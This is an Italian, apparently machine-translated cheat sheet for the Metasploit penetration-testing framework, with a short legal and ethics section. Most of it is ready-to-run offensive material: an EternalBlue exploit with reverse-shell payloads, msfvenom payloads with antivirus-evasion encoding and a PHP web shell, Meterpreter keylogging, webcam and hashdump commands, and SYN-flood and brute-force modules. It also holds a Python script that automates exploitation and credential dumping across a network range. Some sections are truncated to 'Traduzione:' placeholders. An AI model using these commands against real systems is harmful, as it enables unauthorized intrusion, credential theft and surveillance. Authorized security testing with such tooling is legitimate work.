FRONTMATTER_31_# Metasploit Foglio di formaggio¶
__HTML_TAG_21_📋 Copia Tutti i comandi_HTML_TAG_22__
__HTML_TAG_23_📄 Generare PDF
Panoramica¶
Metasploit è il framework di test di penetrazione più utilizzato al mondo, fornendo una piattaforma completa per lo sviluppo, il test e l'esecuzione del codice exploit contro i sistemi di destinazione remoti. Originariamente creato da H.D. Moore e ora mantenuto da Rapid7, Metasploit si è evoluto nello standard de facto per il test di penetrazione e la valutazione della vulnerabilità, offrendo una vasta collezione di exploit, payload, encoders e moduli ausiliari che consentono ai professionisti della sicurezza di identificare, convalidare e dimostrare vulnerabilità di sicurezza in diversi ambienti di calcolo. L'architettura modulare del framework e l'ampio database di exploit noti lo rendono uno strumento indispensabile per hacker etici, ricercatori di sicurezza e tester di penetrazione in tutto il mondo.
La forza principale di Metasploit risiede nella sua capacità di sviluppo e distribuzione di exploit completo, combinando un vasto archivio di exploit collaudati con sofisticati meccanismi di generazione di payload e di consegna. Il quadro comprende migliaia di exploit che mirano a vari sistemi operativi, applicazioni e servizi di rete, insieme a centinaia di payload che vanno da semplici gusci di comando a meccanismi di accesso persistenti avanzati. Le capacità di rilevamento intelligente e di exploit di Metasploit consentono flussi di lavoro automatizzati di valutazione della vulnerabilità, mentre le sue tecniche di evasione avanzate e le opzioni di codifica aiutano a bypassare i moderni controlli di sicurezza e sistemi antivirus.
Le funzionalità di livello enterprise di Metasploit includono funzionalità di test distribuite, strumenti di reportistica e documentazione completi, integrazione con scanner di vulnerabilità e sistemi informativi di sicurezza, e ampie opzioni di personalizzazione per scenari di test specializzati. Il framework supporta molteplici interfacce, tra cui l'accesso a riga di comando, web-based e API, consentendo l'integrazione con pipeline di test di sicurezza automatizzate e strumenti di sicurezza personalizzati. Con la sua comunità attiva di sviluppo, aggiornamenti regolari che incorporano le più recenti vulnerabilità e exploit, e comprovato record di traccia nelle valutazioni di sicurezza professionale, Metasploit rimane il framework di base per il test di penetrazione e la validazione della sicurezza tra le organizzazioni di tutte le dimensioni.
Installazione¶
## Ubuntu/Debian Installazione¶
Installazione di Metasploit sui sistemi Ubuntu/Debian:
# Update system packages
sudo apt update && sudo apt upgrade -y
# Install dependencies
sudo apt install -y curl wget gnupg2 software-properties-common
# Add Rapid7 repository
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
# Alternative: Install from package
wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
chmod +x metasploit-latest-linux-x64-installer.run
sudo ./metasploit-latest-linux-x64-installer.run
# Install from source (development version)
sudo apt install -y git ruby ruby-dev build-essential zlib1g-dev \
libreadline-dev libssl-dev libpq-dev sqlite3 libsqlite3-dev \
libpcap-dev autoconf postgresql postgresql-contrib
# Clone repository
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
# Install Ruby dependencies
gem install bundler
bundle install
# Initialize database
sudo systemctl start postgresql
sudo systemctl enable postgresql
sudo -u postgres createuser -s msf
sudo -u postgres createdb msf_database
# Configure database
cat > config/database.yml << 'EOF'
production:
adapter: postgresql
database: msf_database
username: msf
password:
host: localhost
port: 5432
pool: 5
timeout: 5
EOF
# Initialize Metasploit database
./msfconsole -q -x "db_status; exit"
# Verify installation
msfconsole --version
CentOS/RHEL Installazione¶
# Install EPEL repository
sudo yum install -y epel-release
# Install dependencies
sudo yum install -y curl wget git ruby ruby-devel gcc gcc-c++ \
make autoconf readline-devel openssl-devel zlib-devel \
postgresql postgresql-server postgresql-contrib
# Initialize PostgreSQL
sudo postgresql-setup initdb
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Install Metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
# Configure database
sudo -u postgres createuser -s msf
sudo -u postgres createdb msf_database
# Verify installation
msfconsole --version
macOS Installazione¶
# Install using Homebrew
brew install metasploit
# Install dependencies
brew install postgresql
brew services start postgresql
# Create database
createuser -s msf
createdb msf_database
# Alternative: Install from installer
# Download from https://www.metasploit.com/download
# Run installer package
# Verify installation
msfconsole --version
Installazione di Windows¶
# Download Windows installer
# https://www.metasploit.com/download
# Run installer as Administrator
# Follow installation wizard
# Install PostgreSQL
# Download from https://www.postgresql.org/download/windows/
# Configure database during installation
# Verify installation
# Open Command Prompt or PowerShell
msfconsole --version
# Alternative: Install with Chocolatey
choco install metasploit
# Configure Windows Defender exclusions
# Add Metasploit installation directory to exclusions
Installazione Docker¶
Correre Metasploit in Docker:
# Pull official Metasploit image
docker pull metasploitframework/metasploit-framework
# Run Metasploit console
docker run --rm -it metasploitframework/metasploit-framework
# Run with persistent data
docker run --rm -it \
-v $(pwd)/msf_data:/home/msf/.msf4 \
metasploitframework/metasploit-framework
# Create custom Dockerfile
cat > Dockerfile.metasploit << 'EOF'
FROM metasploitframework/metasploit-framework
# Install additional tools
USER root
RUN apt-get update && apt-get install -y \
nmap \
nikto \
sqlmap \
&& rm -rf /var/lib/apt/lists/*
# Switch back to msf user
USER msf
# Set working directory
WORKDIR /home/msf
CMD ["msfconsole"]
EOF
# Build custom image
docker build -f Dockerfile.metasploit -t metasploit-custom .
# Run with network access
docker run --rm -it --net=host metasploit-custom
Uso di base¶
Metasploit Console¶
Iniziare con msfconsole:
# Start Metasploit console
msfconsole
# Basic commands
help # Show help
version # Show version information
exit # Exit console
# Database commands
db_status # Check database connection
db_connect # Connect to database
db_disconnect # Disconnect from database
db_rebuild_cache # Rebuild module cache
# Workspace management
workspace # List workspaces
workspace -a test # Add workspace
workspace test # Switch to workspace
workspace -d test # Delete workspace
# Module management
show exploits # List all exploits
show payloads # List all payloads
show auxiliary # List auxiliary modules
show post # List post-exploitation modules
show encoders # List encoders
show nops # List NOP generators
# Search modules
search type:exploit platform:windows
search cve:2017
search ms17-010
search apache
Target Discovery¶
Scoperta e scansione obiettivi:
# Network discovery with auxiliary modules
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.1.0/24
run
# Port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
set PORTS 1-1000
run
# Service identification
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.100
run
# SMB scanning
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
# Database services
use auxiliary/scanner/mysql/mysql_version
set RHOSTS 192.168.1.100
run
# Web application scanning
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
set DICTIONARY /usr/share/wordlists/dirb/common.txt
run
# Vulnerability scanning
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run
# Save scan results
db_nmap -sS -O 192.168.1.0/24
hosts # View discovered hosts
services # View discovered services
vulns # View discovered vulnerabilities
Exploitation¶
Flusso di lavoro di sfruttamento di base:
# Select exploit module
use exploit/windows/smb/ms17_010_eternalblue
show options # Display required options
show targets # Display available targets
show payloads # Display compatible payloads
# Configure exploit
set RHOSTS 192.168.1.100
set RPORT 445
set TARGET 0
# Select payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
# Verify configuration
show options
check # Check if target is vulnerable
# Execute exploit
exploit
# or
run
# Alternative: Use exploit command directly
exploit -j # Run as job
exploit -z # Don't interact with session
# Session management
sessions # List active sessions
sessions -i 1 # Interact with session 1
sessions -k 1 # Kill session 1
sessions -K # Kill all sessions
Payload Generation¶
Generando i payload standalone:
# Generate Windows executable
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f exe -o payload.exe
# Generate Linux executable
msfvenom -p linux/x86/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f elf -o payload.elf
# Generate PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.php
# Generate PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f psh -o payload.ps1
# Generate Android APK
msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-o payload.apk
# Encoded payloads (AV evasion)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 \
-f exe -o encoded_payload.exe
# List available formats
msfvenom --list formats
# List available encoders
msfvenom --list encoders
# List available payloads
msfvenom --list payloads
Caratteristiche avanzate¶
Meterpreter¶
Uso avanzato del Meterpreter:
# Basic Meterpreter commands
sysinfo # System information
getuid # Current user
getpid # Current process ID
ps # Process list
pwd # Current directory
ls # List files
cd /path # Change directory
# File operations
download file.txt # Download file
upload file.txt # Upload file
edit file.txt # Edit file
cat file.txt # Display file content
rm file.txt # Delete file
mkdir newdir # Create directory
# System operations
shell # Drop to system shell
execute -f cmd.exe -i # Execute command interactively
migrate 1234 # Migrate to process ID 1234
kill 1234 # Kill process ID 1234
reboot # Reboot system
shutdown # Shutdown system
# Network operations
netstat # Network connections
route # Routing table
arp # ARP table
portfwd add -l 8080 -p 80 -r 192.168.1.100 # Port forwarding
# Privilege escalation
getsystem # Attempt privilege escalation
getprivs # Get current privileges
# Persistence
run persistence -X -i 10 -p 4444 -r 192.168.1.50
# Information gathering
hashdump # Dump password hashes
screenshot # Take screenshot
webcam_snap # Take webcam photo
record_mic # Record microphone
keyscan_start # Start keylogger
keyscan_dump # Dump keystrokes
keyscan_stop # Stop keylogger
# Registry operations (Windows)
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion -v ProductName
reg setval -k HKLM\\Software\\Test -v TestValue -t REG_SZ -d "Test Data"
reg deleteval -k HKLM\\Software\\Test -v TestValue
# Background session
background # Background current session
Post-Exploitation¶
Moduli di post-esplorazione:
# Load post-exploitation module
use post/windows/gather/hashdump
set SESSION 1
run
# System information gathering
use post/windows/gather/enum_system
use post/linux/gather/enum_system
use post/osx/gather/enum_osx
# Network enumeration
use post/windows/gather/enum_domain
use post/windows/gather/enum_shares
use post/multi/gather/enum_network
# Credential harvesting
use post/windows/gather/credentials/windows_autologin
use post/windows/gather/smart_hashdump
use post/linux/gather/hashdump
# Privilege escalation
use post/windows/escalate/getsystem
use post/linux/escalate/cve_2021_4034
# Persistence mechanisms
use post/windows/manage/persistence_exe
use post/linux/manage/sshkey_persistence
# Data exfiltration
use post/windows/gather/enum_files
use post/multi/gather/firefox_creds
use post/multi/gather/chrome_cookies
# Lateral movement
use post/windows/gather/enum_domain_users
use post/windows/gather/enum_computers
Moduli ausiliari¶
Utilizzo di moduli ausiliari per varie attività:
# Brute force attacks
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
# FTP brute force
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASS_FILE passwords.txt
run
# HTTP brute force
use auxiliary/scanner/http/http_login
set RHOSTS 192.168.1.100
set AUTH_URI /admin/login
set USERNAME admin
set PASS_FILE passwords.txt
run
# Database attacks
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/postgres/postgres_login
# Denial of service
use auxiliary/dos/tcp/synflood
set RHOST 192.168.1.100
run
# Information gathering
use auxiliary/gather/shodan_search
set SHODAN_APIKEY your_api_key
set QUERY "apache"
run
# Fuzzing
use auxiliary/fuzzers/http/http_form_field
set RHOSTS 192.168.1.100
set URI /login.php
run
# SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.0/24
run
Moduli personalizzati¶
Creazione di personalizzato Moduli Metasploit:
¶
Traduzione:
Automation Scripts¶
Automated Penetration Testing Script¶
#!/usr/bin/env python3
# Automated penetration testing with Metasploit
import subprocess
import json
import time
import sys
import os
import argparse
from datetime import datetime
class MetasploitAutomator:
def __init__(self, msf_path="msfconsole"):
self.msf_path = msf_path
self.workspace = f"auto_test_\\\\{int(time.time())\\\\}"
self.results = \\\\{\\\\}
def execute_msf_command(self, commands, timeout=300):
"""Execute Metasploit commands"""
if isinstance(commands, str):
commands = [commands]
# Create resource file
resource_file = f"/tmp/msf_commands_\\\\{int(time.time())\\\\}.rc"
with open(resource_file, 'w') as f:
for cmd in commands:
f.write(f"\\\\{cmd\\\\}\n")
f.write("exit\n")
try:
# Execute Metasploit with resource file
result = subprocess.run([
self.msf_path, "-q", "-r", resource_file
], capture_output=True, text=True, timeout=timeout)
# Clean up
os.remove(resource_file)
return result.stdout, result.stderr, result.returncode
except subprocess.TimeoutExpired:
print(f"Command timed out after \\\\{timeout\\\\} seconds")
return "", "Timeout", 1
except Exception as e:
print(f"Error executing command: \\\\{e\\\\}")
return "", str(e), 1
def setup_workspace(self):
"""Setup Metasploit workspace"""
commands = [
"db_status",
f"workspace -a \\\\{self.workspace\\\\}",
f"workspace \\\\{self.workspace\\\\}"
]
stdout, stderr, returncode = self.execute_msf_command(commands)
if returncode == 0:
print(f"Workspace '\\\\{self.workspace\\\\}' created successfully")
return True
else:
print(f"Failed to create workspace: \\\\{stderr\\\\}")
return False
def network_discovery(self, target_range):
"""Perform network discovery"""
print(f"Starting network discovery for \\\\{target_range\\\\}")
commands = [
f"workspace \\\\{self.workspace\\\\}",
f"db_nmap -sn \\\\{target_range\\\\}",
"hosts -c address,name,os_name,purpose",
"services -c port,proto,name,state"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=600)
if returncode == 0:
print("Network discovery completed")
self.results['discovery'] = stdout
return True
else:
print(f"Network discovery failed: \\\\{stderr\\\\}")
return False
def vulnerability_scan(self, targets):
"""Perform vulnerability scanning"""
print(f"Starting vulnerability scan for \\\\{targets\\\\}")
scan_modules = [
"auxiliary/scanner/smb/smb_ms17_010",
"auxiliary/scanner/http/http_version",
"auxiliary/scanner/ssh/ssh_version",
"auxiliary/scanner/ftp/ftp_version",
"auxiliary/scanner/mysql/mysql_version"
]
commands = [f"workspace \\\\{self.workspace\\\\}"]
for module in scan_modules:
commands.extend([
f"use \\\\{module\\\\}",
f"set RHOSTS \\\\{targets\\\\}",
"run",
"back"
])
commands.append("vulns")
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=1200)
if returncode == 0:
print("Vulnerability scan completed")
self.results['vulnerabilities'] = stdout
return True
else:
print(f"Vulnerability scan failed: \\\\{stderr\\\\}")
return False
def automated_exploitation(self, targets):
"""Perform automated exploitation"""
print(f"Starting automated exploitation for \\\\{targets\\\\}")
# Common exploits to try
exploits = [
\\\\{
'module': 'exploit/windows/smb/ms17_010_eternalblue',
'payload': 'windows/x64/meterpreter/reverse_tcp',
'port': 445
\\\\},
\\\\{
'module': 'exploit/linux/ssh/ssh_login',
'payload': 'linux/x86/meterpreter/reverse_tcp',
'port': 22
\\\\},
\\\\{
'module': 'exploit/multi/http/apache_struts2_content_type_ognl',
'payload': 'linux/x86/meterpreter/reverse_tcp',
'port': 80
\\\\}
]
successful_exploits = []
for exploit in exploits:
commands = [
f"workspace \\\\{self.workspace\\\\}",
f"use \\\\{exploit['module']\\\\}",
f"set RHOSTS \\\\{targets\\\\}",
f"set RPORT \\\\{exploit['port']\\\\}",
f"set PAYLOAD \\\\{exploit['payload']\\\\}",
"set LHOST 0.0.0.0", # Auto-detect
"set LPORT 4444",
"check",
"exploit -j", # Run as job
"sleep 10",
"sessions -l"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=300)
if "session" in stdout.lower() and "opened" in stdout.lower():
print(f"Successful exploitation with \\\\{exploit['module']\\\\}")
successful_exploits.append(exploit)
else:
print(f"Exploitation failed with \\\\{exploit['module']\\\\}")
self.results['exploits'] = successful_exploits
return len(successful_exploits) > 0
def post_exploitation(self):
"""Perform post-exploitation activities"""
print("Starting post-exploitation activities")
commands = [
f"workspace \\\\{self.workspace\\\\}",
"sessions -l",
"sessions -i 1", # Interact with first session
"sysinfo",
"getuid",
"ps",
"hashdump",
"background"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=300)
if returncode == 0:
print("Post-exploitation completed")
self.results['post_exploitation'] = stdout
return True
else:
print(f"Post-exploitation failed: \\\\{stderr\\\\}")
return False
def generate_report(self, output_file="metasploit_report.html"):
"""Generate comprehensive report"""
html_content = f"""
<!DOCTYPE html>
<html>
<head>
<title>Metasploit Automated Penetration Test Report</title>
<style>
body \\\\{\\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}\\\\}
.section \\\\{\\\\{ margin: 20px 0; padding: 15px; border: 1px solid #ddd; \\\\}\\\\}
.critical \\\\{\\\\{ color: red; font-weight: bold; \\\\}\\\\}
.warning \\\\{\\\\{ color: orange; font-weight: bold; \\\\}\\\\}
.info \\\\{\\\\{ color: blue; \\\\}\\\\}
.success \\\\{\\\\{ color: green; font-weight: bold; \\\\}\\\\}
table \\\\{\\\\{ border-collapse: collapse; width: 100%; \\\\}\\\\}
th, td \\\\{\\\\{ border: 1px solid #ddd; padding: 8px; text-align: left; \\\\}\\\\}
th \\\\{\\\\{ background-color: #f2f2f2; \\\\}\\\\}
pre \\\\{\\\\{ background: #f5f5f5; padding: 10px; overflow-x: auto; \\\\}\\\\}
</style>
</head>
<body>
<h1>Metasploit Automated Penetration Test Report</h1>
<p>Generated: \\\\{datetime.now().isoformat()\\\\}</p>
<p>Workspace: \\\\{self.workspace\\\\}</p>
<div class="section">
<h2>Executive Summary</h2>
<ul>
<li>Successful Exploits: \\\\{len(self.results.get('exploits', []))\\\\}</li>
<li>Vulnerabilities Found: \\\\{self.count_vulnerabilities()\\\\}</li>
<li>Hosts Discovered: \\\\{self.count_hosts()\\\\}</li>
</ul>
</div>
<div class="section">
<h2>Network Discovery Results</h2>
<pre>\\\\{self.results.get('discovery', 'No discovery data available')\\\\}</pre>
</div>
<div class="section">
<h2 class="critical">Successful Exploits</h2>
<table>
<tr><th>Module</th><th>Payload</th><th>Port</th></tr>
"""
for exploit in self.results.get('exploits', []):
html_content += f"""
<tr>
<td>\\\\{exploit['module']\\\\}</td>
<td>\\\\{exploit['payload']\\\\}</td>
<td>\\\\{exploit['port']\\\\}</td>
</tr>"""
html_content += """
</table>
</div>
<div class="section">
<h2>Vulnerability Scan Results</h2>
<pre>\\\\{\\\\}</pre>
</div>
<div class="section">
<h2>Post-Exploitation Results</h2>
<pre>\\\\{\\\\}</pre>
</div>
<div class="section">
<h2>Recommendations</h2>
<ul>
<li>Patch all identified vulnerabilities immediately</li>
<li>Implement network segmentation</li>
<li>Deploy endpoint detection and response (EDR) solutions</li>
<li>Conduct regular security assessments</li>
<li>Implement multi-factor authentication</li>
<li>Monitor network traffic for suspicious activities</li>
</ul>
</div>
</body>
</html>
""".format(
self.results.get('vulnerabilities', 'No vulnerability data available'),
self.results.get('post_exploitation', 'No post-exploitation data available')
)
with open(output_file, 'w') as f:
f.write(html_content)
print(f"Report generated: \\\\{output_file\\\\}")
return output_file
def count_vulnerabilities(self):
"""Count vulnerabilities from scan results"""
vuln_data = self.results.get('vulnerabilities', '')
return vuln_data.count('Vulnerable') + vuln_data.count('VULNERABLE')
def count_hosts(self):
"""Count discovered hosts"""
discovery_data = self.results.get('discovery', '')
return discovery_data.count('address')
def cleanup(self):
"""Clean up workspace and sessions"""
commands = [
"sessions -K", # Kill all sessions
f"workspace -d \\\\{self.workspace\\\\}"
]
self.execute_msf_command(commands)
print("Cleanup completed")
def run_full_assessment(self, target_range, output_dir="/tmp/metasploit_assessment"):
"""Run complete automated assessment"""
print("Starting automated Metasploit assessment...")
# Create output directory
os.makedirs(output_dir, exist_ok=True)
try:
# Setup workspace
if not self.setup_workspace():
return False
# Network discovery
if not self.network_discovery(target_range):
return False
# Vulnerability scanning
if not self.vulnerability_scan(target_range):
return False
# Automated exploitation
self.automated_exploitation(target_range)
# Post-exploitation
self.post_exploitation()
# Generate report
report_file = os.path.join(output_dir, "metasploit_report.html")
self.generate_report(report_file)
print("Automated assessment completed successfully")
return True
except Exception as e:
print(f"Assessment failed: \\\\{e\\\\}")
return False
finally:
self.cleanup()
def main():
parser = argparse.ArgumentParser(description='Metasploit Automation')
parser.add_argument('--target', required=True, help='Target range (e.g., 192.168.1.0/24)')
parser.add_argument('--output', default='/tmp/metasploit_assessment', help='Output directory')
parser.add_argument('--msf-path', default='msfconsole', help='Path to msfconsole')
args = parser.parse_args()
# Initialize automator
automator = MetasploitAutomator(args.msf_path)
# Run assessment
success = automator.run_full_assessment(args.target, args.output)
if success:
print("Assessment completed successfully")
else:
print("Assessment failed")
sys.exit(1)
if __name__ == "__main__":
main()
Esempi di integrazione¶
CI/CD Integrazione¶
# Jenkins Pipeline for Metasploit Integration
pipeline \\\\{
agent \\\\{
label 'security-testing'
\\\\}
environment \\\\{
MSF_DATABASE_URL = 'postgresql://msf:password@localhost/msf_database'
TARGET_NETWORK = '192.168.100.0/24'
\\\\}
stages \\\\{
stage('Setup Environment') \\\\{
steps \\\\{
script \\\\{
// Start PostgreSQL and initialize Metasploit
sh '''
sudo systemctl start postgresql
msfdb init
msfconsole -q -x "db_status; exit"
'''
\\\\}
\\\\}
\\\\}
stage('Network Discovery') \\\\{
steps \\\\{
script \\\\{
// Perform network discovery
sh '''
cat > discovery.rc << 'EOF'
workspace -a jenkins_test
db_nmap -sn $\\\\{TARGET_NETWORK\\\\}
hosts -o hosts.xml
exit
EOF
msfconsole -q -r discovery.rc
'''
\\\\}
\\\\}
\\\\}
stage('Vulnerability Assessment') \\\\{
steps \\\\{
script \\\\{
// Run vulnerability scans
sh '''
cat > vuln_scan.rc << 'EOF'
workspace jenkins_test
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $\\\\{TARGET_NETWORK\\\\}
run
vulns -o vulns.xml
exit
EOF
msfconsole -q -r vuln_scan.rc
'''
\\\\}
\\\\}
\\\\}
stage('Generate Report') \\\\{
steps \\\\{
script \\\\{
// Generate security report
sh '''
python3 generate_msf_report.py \
--hosts hosts.xml \
--vulns vulns.xml \
--output security_report.html
'''
\\\\}
\\\\}
\\\\}
\\\\}
post \\\\{
always \\\\{
// Archive results
archiveArtifacts artifacts: '*.xml,*.html', fingerprint: true
// Publish report
publishHTML([
allowMissing: false,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: '.',
reportFiles: 'security_report.html',
reportName: 'Security Assessment Report'
])
// Clean up
sh '''
msfconsole -q -x "workspace -d jenkins_test; exit"
rm -f *.rc *.xml
'''
\\\\}
failure \\\\{
// Send notification
emailext (
subject: "Security Assessment Failed: $\\\\{env.JOB_NAME\\\\} - $\\\\{env.BUILD_NUMBER\\\\}",
body: "Security assessment failed. Check console output for details.",
to: "$\\\\{env.SECURITY_TEAM_EMAIL\\\\}"
)
\\\\}
\\\\}
\\\\}
Risoluzione dei problemi¶
Questioni comuni¶
Database Problemi di connessione: Traduzione:
Difficoltà di caricamento del modulo: Traduzione:
Payload Generation Issues: Traduzione:
Ottimizzazione delle prestazioni¶
Ottimizzazione delle prestazioni Metasploit:
# Database optimization
# Edit postgresql.conf
sudo nano /etc/postgresql/*/main/postgresql.conf
# Increase shared_buffers
shared_buffers = 256MB
# Increase work_mem
work_mem = 4MB
# Restart PostgreSQL
sudo systemctl restart postgresql
# Metasploit optimization
# Increase Ruby memory limit
export RUBY_HEAP_MIN_SLOTS=800000
export RUBY_HEAP_SLOTS_INCREMENT=300000
export RUBY_HEAP_SLOTS_GROWTH_FACTOR=1
export RUBY_GC_MALLOC_LIMIT=79000000
# Start Metasploit with optimizations
msfconsole
Considerazioni di sicurezza¶
Sicurezza operativa¶
** Uso legale ed etico: ** - No. Utilizzare solo Metasploit contro i sistemi che possiedi o hai il permesso esplicito per testare - Comprendi i requisiti legali per i test di penetrazione nella tua giurisdizione - Implementare procedure di autorizzazione e documentazione adeguate - Limitazioni di portata e regole di impegno - Mantenere la riservatezza delle vulnerabilità scoperte
** Protezione dei dati. - Crittografia database Metasploit contenenti informazioni sensibili - Attuazione politiche di conservazione dei dati sicure per i risultati di valutazione - Controllo dell'accesso agli strumenti e ai risultati di sfruttamento - Trasmissione sicura dei rapporti di valutazione e dei risultati - Pulizia regolare dei file temporanei e dei dati di sessione
Considerazioni difensive¶
**Detezione e prevenzione: ** - Monitor per le firme Metasploit e gli indicatori di compromesso - Implementare sistemi di rilevamento delle intrusioni di rete - Distribuire soluzioni di rilevamento e risposta endpoint - Valutazioni di sicurezza regolari e gestione delle vulnerabilità - Formazione per la sensibilizzazione alla sicurezza per team di sviluppo e operazioni